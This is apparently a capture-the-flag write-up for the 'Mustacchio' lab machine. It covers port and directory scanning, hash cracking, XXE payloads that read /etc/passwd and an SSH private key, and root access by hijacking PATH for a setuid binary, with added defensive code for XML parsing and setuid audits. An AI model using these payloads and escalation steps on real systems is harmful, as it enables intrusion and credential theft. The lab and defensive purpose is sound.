Date: 14, June, 2021
Author: Dhilip Sanjay S
$ nmap -sC -sV -p- -oN nmap.out
Starting Nmap 7.91 ( ) at 2021-06-14 14:57 IST
Nmap scan report for
Host is up (0.16s latency).
Not shown: 65532 filtered ports
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 58:1b:0c:0f:fa:cf:05:be:4c:c0:7a:f1:f1:88:61:1c (RSA)
| 256 3c:fc:e8:a3:7e:03:9a:30:2c:77:e0:0a:1c:e4:52:e6 (ECDSA)
|_ 256 9d:59:c6:c7:79:c5:54:c4:1d:aa:e4:d1:84:71:01:92 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
8765/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 1269.52 seconds
$ gobuster dir -u -t 50 -w /usr/share/wordlists/dirb/common.txt | tee gobuster.out
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
2021/06/14 15:02:30 Starting gobuster in directory enumeration mode
/.hta (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/custom (Status: 301) [Size: 315] [-->]
/fonts (Status: 301) [Size: 314] [-->]
/images (Status: 301) [Size: 315] [-->]
/index.html (Status: 200) [Size: 1752]
/robots.txt (Status: 200) [Size: 28]
/server-status (Status: 403) [Size: 278]
2021/06/14 15:02:49 Finished
- It's an SQLite database backup:
$ file users.bak
users.bak: SQLite 3.x database, last written using SQLite version 3034001
- Using sqlite3, we can find the admin's password:
$ sqlite3 users.bak
SQLite version 3.34.1 2021-01-20 14:10:07
Enter ".help" for usage hints.
sqlite> .schema
CREATE TABLE users(username text NOT NULL, password text NOT NULL);
sqlite> .tables
sqlite> SELECT * FROM users;
- Use john to crack the admin's hash:
$ john admin_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "has-160"
Use the "--format=has-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed
- Maybe this is the password for the admin panel on port 8765.
- There was a backup file at
- Contents of that file:
$ cat dontforget.bak
<?xml version="1.0" encoding="UTF-8"?>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
- Waste of time!!!
- The admin panel comment box accepted only XML.
- Try a basic XXE payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
- The Output of the XXE:
- In the home page of the admin panel, there was a comment:
<!-- Barry, you can now SSH in using your key!-->
- So, try to read Barry's Private Key using XXE:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
- And we get the Private key successfully.
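As an added defender's example (not code from the original write-up): a comment-box parser that refuses any DOCTYPE before an entity can be declared, run against the DOCTYPE shown above and a constructed benign comment. The <comment> root element and the classify() helper are assumptions.

```python
import xml.parsers.expat

class DtdRejected(ValueError):
    """Submitted XML carried a DOCTYPE (and so could declare entities)."""

def parse_comment(xml_bytes):
    """Return the <name>, <author> and <com> text of a comment document.

    The DOCTYPE handler fires before any entity can be declared, so the
    payload above is refused at that point; the external entity handler
    returning 0 is defence in depth should a DTD ever slip through
    (expat turns a 0 return into a parse error instead of fetching the file).
    """
    fields = {"name": "", "author": "", "com": ""}
    stack = []                      # element names enclosing the current text

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected("DOCTYPE declarations are not accepted")

    def on_text(data):
        if stack and stack[-1] in fields:
            fields[stack[-1]] += data   # expat may deliver text in chunks

    p = xml.parsers.expat.ParserCreate()
    p.StartDoctypeDeclHandler = on_doctype
    p.ExternalEntityRefHandler = lambda ctx, base, sysid, pubid: 0
    p.StartElementHandler = lambda name, attrs: stack.append(name)
    p.EndElementHandler = lambda name: stack.pop()
    p.CharacterDataHandler = on_text
    p.Parse(xml_bytes, True)
    return fields

def classify(xml_bytes):
    """Triage verdict for a submission: 'ok', 'rejected-dtd' or 'malformed'."""
    try:
        parse_comment(xml_bytes)
    except DtdRejected:
        return "rejected-dtd"
    except xml.parsers.expat.ExpatError:
        return "malformed"
    return "ok"

# Constructed samples: PAGE_PAYLOAD is the DOCTYPE from the write-up above,
# BENIGN reuses the same element names under an assumed <comment> root.
PAGE_PAYLOAD = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
                b'<!DOCTYPE foo [ <!ELEMENT foo ANY >\n'
                b'<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>')
BENIGN = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
          b'<comment><name>Joe Hamd</name><author>Barry Clad</author>'
          b'<com>Nice mustache.</com></comment>')

if __name__ == "__main__":
    print(classify(PAGE_PAYLOAD), classify(BENIGN), parse_comment(BENIGN))
```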
- Save the private key and change the permissions.
- But we need the passphrase!
$ nano id_rsa_barry
$ chmod 600 id_rsa_barry
$ ssh -i id_rsa_barry [email protected]
Enter passphrase for key 'id_rsa_barry':
- Use john to find the passphrase:
$ locate ssh2john
$ /usr/share/john/
Usage: /usr/share/john/ <RSA/DSA/EC/OpenSSH private key file(s)>
$ john forjohn.txt --format="SSH" --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
REDACTED (id_rsa_barry)
1g 0:00:00:07 68.71% (ETA: 16:14:08) 0.1420g/s 1399Kp/s 1399Kc/s 1399KC/s babaygirl75
1g 0:00:00:08 82.15% (ETA: 16:14:07) 0.1191g/s 1402Kp/s 1402Kc/s 1402KC/s 84059932
Session aborted
$ ssh -i id_rsa_barry [email protected]
Enter passphrase for key 'id_rsa_barry':
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)
* Documentation:
* Management:
* Support:
34 packages can be updated.
16 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
barry@mustacchio:~$ whoami
barry@mustacchio:~$ ls
barry@mustacchio:~$ cat user.txt
barry@mustacchio:~$ find / -perm -u=s 2>/dev/null
barry@mustacchio:~$ cd /home/joe/
barry@mustacchio:/home/joe$ ls -la /lib64/
lrwxrwxrwx 1 root root 32 Jun 5 2020 /lib64/ -> /lib/x86_64-linux-gnu/
barry@mustacchio:/home/joe$ file live_log
live_log: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/, BuildID[sha1]=6c03a68094c63347aeb02281a45518964ad12abe, for GNU/Linux 3.2.0, not stripped
barry@mustacchio:/home/joe$ strings live_log
Live Nginx Log Reader
tail -f /var/log/nginx/access.log
- The shared object can be used for privilege escalation!
- But unfortunately,
was not installed on the machine.
- The other binary being used here is tail, called without an absolute path, so it is resolved through PATH.
- Change the PATH variable.
barry@mustacchio:/home/joe$ echo $PATH
barry@mustacchio:/home/joe$ PATH=/home/barry:$PATH
barry@mustacchio:/home/joe$ echo $PATH
- Create a tail executable in /home/barry which opens /bin/bash:
barry@mustacchio:/home/joe$ nano /home/barry/tail
barry@mustacchio:/home/joe$ cat /home/barry/tail
barry@mustacchio:/home/joe$ chmod +x /home/barry/tail
barry@mustacchio:/home/joe$ ls -l /home/barry/tail
-rwxrwxr-x 1 barry barry 10 Jun 14 11:15 /home/barry/tail
barry@mustacchio:/home/joe$ ./live_log
root@mustacchio:/home/joe# whoami
root@mustacchio:/home/joe# cd /root/
root@mustacchio:/root# ls
root@mustacchio:/root# cat root.txt
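As an added audit example, not from the write-up: given a binary's strings output and its mode bits, flag command strings that name a program without a directory (so it is looked up via PATH, as live_log's tail is) and raise the severity when the file is setuid and links a PATH-searching spawner such as system(). The sample strings output is constructed; only the two lines taken from the page's strings output are real.

```python
import re
import stat

# Constructed sample modelled on the write-up's `strings live_log` output;
# only the 'Live Nginx Log Reader' and 'tail -f ...' lines come from the page.
SAMPLE_STRINGS = """\
libc.so.6
setuid
system
__libc_start_main
Live Nginx Log Reader
tail -f /var/log/nginx/access.log
/usr/bin/tail -n 20 /var/log/nginx/error.log
.shstrtab
"""

# libc calls that hand a command line to a shell or search PATH for the program.
PATH_SPAWNERS = {"system", "popen", "execvp", "execlp", "execvpe"}
BARE_WORD = re.compile(r"[A-Za-z][\w.+-]*")

def relative_command(line):
    """Return the program name if `line` looks like 'prog -flag /path ...'
    with `prog` given without a directory component, else None."""
    tokens = line.split()
    if len(tokens) < 2 or not BARE_WORD.fullmatch(tokens[0]):
        return None
    if not any(t.startswith(("-", "/")) for t in tokens[1:]):
        return None                 # prose such as 'Live Nginx Log Reader'
    return tokens[0]

def audit_binary(strings_output, mode):
    """Findings for one binary: each PATH-resolved command string, rated
    'high' when the file is setuid AND links a PATH-searching spawner."""
    lines = [l.strip() for l in strings_output.splitlines() if l.strip()]
    is_suid = bool(mode & stat.S_ISUID)
    spawners = sorted(PATH_SPAWNERS.intersection(lines))
    findings = []
    for line in lines:
        prog = relative_command(line)
        if prog is None:
            continue
        severity = "high" if is_suid and spawners else "info"
        findings.append({"program": prog, "string": line, "suid": is_suid,
                         "spawners": spawners, "severity": severity})
    return findings

if __name__ == "__main__":
    for finding in audit_binary(SAMPLE_STRINGS, 0o104755):   # -rwsr-xr-x
        print(finding)
```

The fix on the binary side is the mirror image: invoke /usr/bin/tail by absolute path with execve(), or at least reset PATH to a fixed value before calling system().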